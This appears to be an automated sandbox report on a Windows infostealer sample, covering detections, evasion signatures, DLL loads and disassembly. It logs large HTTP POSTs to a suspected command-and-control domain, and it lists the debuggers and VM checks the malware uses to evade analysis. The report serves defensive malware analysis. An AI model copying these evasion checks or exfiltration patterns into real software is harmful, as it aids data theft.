Windows Analysis Report
2OJYjm4J1B.exe

Overview

General Information

Sample name: 2OJYjm4J1B.exe
renamed because original name is a hash value
Original sample name: 49f7c4981eb383aed2c3f6588545b605.exe
Analysis ID: 1579639
MD5: 49f7c4981eb383aed2c3f6588545b605
SHA1: fa4bf7467762247e1c5933fe25c39875b34703a1
SHA256: 4d44e006134267879fc41b2e837319fbc5b97210ad2ed3902ecfd4fd98af93e7
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 2OJYjm4J1B.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\2OJYjm4J1B.exe" MD5: 49F7C4981EB383AED2C3F6588545B605)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 2OJYjm4J1B.exeAvira: detected
Source: 2OJYjm4J1B.exeReversingLabs: Detection: 69%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: 2OJYjm4J1B.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: -----BEGIN PUBLIC KEY-----0_2_0027DCF0
Source: 2OJYjm4J1B.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_002BA5B0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_002BB560
Source: 2OJYjm4J1B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0025255D
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002529FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 501223
Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 209Data Ascii: { "id1": "<html>\r\n<head><title>502 Bad Gateway<\/title><\/head>\r\n<body>\r\n<center><h1>502 Bad Gateway<\/h1><\/center>\r\n<hr><center>nginx\/1.22.1<\/center>\r\n<\/body>\r\n<\/html>\r\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031A8C0 recvfrom,0_2_0031A8C0
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20ht.top
Source: unknownHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 501223
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.css
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.jpg
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1870769984.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000002.1870769984.00000000014E9000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1
Source: 2OJYjm4J1B.exe, 00000000.00000003.1868687795.00000000014E3000.00000004.00000020.00020000.00000000.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1868847576.00000000014E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850:
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://html4/loose.dtd
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 2OJYjm4J1B.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: 2OJYjm4J1B.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: 2OJYjm4J1B.exe, 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ip
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: 2OJYjm4J1B.exeStatic PE information: section name: .idata
Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002605B00_2_002605B0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00266FA00_2_00266FA0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0028F1000_2_0028F100
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031B1800_2_0031B180
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005DE0300_2_005DE030
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003200E00_2_003200E0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002B62100_2_002B6210
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031C3200_2_0031C320
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003204200_2_00320420
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005A44100_2_005A4410
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025E6200_2_0025E620
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031C7700_2_0031C770
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005B67300_2_005B6730
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002BA7F00_2_002BA7F0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005D47800_2_005D4780
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0030C9000_2_0030C900
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025A9600_2_0025A960
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002649400_2_00264940
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00426AC00_2_00426AC0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0050AAC00_2_0050AAC0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003E4B600_2_003E4B60
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0050AB2C0_2_0050AB2C
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025CBB00_2_0025CBB0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005C8BF00_2_005C8BF0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005DCC700_2_005DCC70
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005D4D400_2_005D4D40
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00410D800_2_00410D80
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005CCD800_2_005CCD80
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0056AE300_2_0056AE30
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00274F700_2_00274F70
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0031EF900_2_0031EF90
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00318F900_2_00318F90
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005A2F900_2_005A2F90
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002610E60_2_002610E6
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005BD4300_2_005BD430
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005C35B00_2_005C35B0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005E17800_2_005E1780
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_003098800_2_00309880
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005A99200_2_005A9920
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005D3A700_2_005D3A70
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005C1BD00_2_005C1BD0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00291BE00_2_00291BE0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_005B7CC00_2_005B7CC0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00509C800_2_00509C80
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_00265DB00_2_00265DB0
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00407220 appears 98 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002571E0 appears 47 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0026CD40 appears 78 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002950A0 appears 91 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0025CAA0 appears 62 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002575A0 appears 647 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00295340 appears 45 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0025C960 appears 36 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0042CBC0 appears 99 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00294F40 appears 311 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 00294FD0 appears 258 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 003344A0 appears 70 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 0026CCD0 appears 54 times
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: String function: 002573F0 appears 110 times
Source: 2OJYjm4J1B.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 2OJYjm4J1B.exeStatic PE information: Section: oshltrdl ZLIB complexity 0.9944817435143182
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_0025255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0025255D
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_2_002529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_002529FF
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: 2OJYjm4J1B.exeReversingLabs: Detection: 69%
Source: 2OJYjm4J1B.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2OJYjm4J1B.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: winmm.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: cryptbase.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: cryptsp.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: rsaenh.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: napinsp.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: wshbth.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: nlaapi.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: mswsock.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: winrnr.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeSection loaded: kernel.appcore.dll
Source: 2OJYjm4J1B.exeStatic file information: File size 4456448 > 1048576
Source: 2OJYjm4J1B.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: 2OJYjm4J1B.exeStatic PE information: Raw size of oshltrdl is bigger than: 0x100000 < 0x1b8e00

Data Obfuscation

Source: C:\Users\user\Desktop\2OJYjm4J1B.exeUnpacked PE file: 0.2.2OJYjm4J1B.exe.250000.0.unpack :EW;.rsrc:W;.idata :W; :EW;oshltrdl:EW;ifmqqwjz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;oshltrdl:EW;ifmqqwjz:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: 2OJYjm4J1B.exeStatic PE information: real checksum: 0x444de7 should be: 0x44168a
Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: 2OJYjm4J1B.exeStatic PE information: section name: .idata
Source: 2OJYjm4J1B.exeStatic PE information: section name:
Source: 2OJYjm4J1B.exeStatic PE information: section name: oshltrdl
Source: 2OJYjm4J1B.exeStatic PE information: section name: ifmqqwjz
Source: 2OJYjm4J1B.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF50 push eax; iretd 0_3_0150CF51
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150CF54 push eax; iretd 0_3_0150CF55
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_0150B534 push ds; retf 0001h0_3_0150B5E9
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01515BD2 push eax; retf 0000h0_3_01515BD3
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeCode function: 0_3_01508DE2 pushad ; iretd 0_3_01508E89
Source: 2OJYjm4J1B.exeStatic PE information: section name: oshltrdl entropy: 7.955137749688428

Boot Survival

Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: FilemonClass
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: RegmonClass
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: Regmonclass
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeWindow searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCMON.EXE
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
Source: 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 2OJYjm4J1B.exe, 00000000.00000002.1869052182.0000000000811000.00000040.00000001.01000000.00000003.sdmp, 2OJYjm4J1B.exe, 00000000.00000003.1473290526.0000000007290000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B28E5A second address: B28E73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jng 00007FA6CC859ED4h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2920D second address: B29212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A0F6 second address: B2A118 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CC859ED0h 0x00000008 jmp 00007FA6CC859ECAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA6CC859ECBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A118 second address: B2A122 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA6CD35B91Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A122 second address: B2A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FA6CC859EC8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 xor di, C970h 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007FA6CC859EC8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007FA6CC859EC8h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jnp 00007FA6CC859EC6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1A5 second address: B2A1AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1AB second address: B2A1B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1B1 second address: B2A1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1B5 second address: B2A1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2A1C3 second address: B2A1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2BD1E second address: B2BD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FA6CC859ED0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2BD43 second address: B2BDA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007FA6CD35B918h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 or di, C54Dh 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ecx 0x0000002b call 00007FA6CD35B918h 0x00000030 pop ecx 0x00000031 mov dword ptr [esp+04h], ecx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc ecx 0x0000003e push ecx 0x0000003f ret 0x00000040 pop ecx 0x00000041 ret 0x00000042 push 00000000h 0x00000044 sub di, 68FFh 0x00000049 push eax 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2BDA6 second address: B2BDAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: B2DF02 second address: B2DF08 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
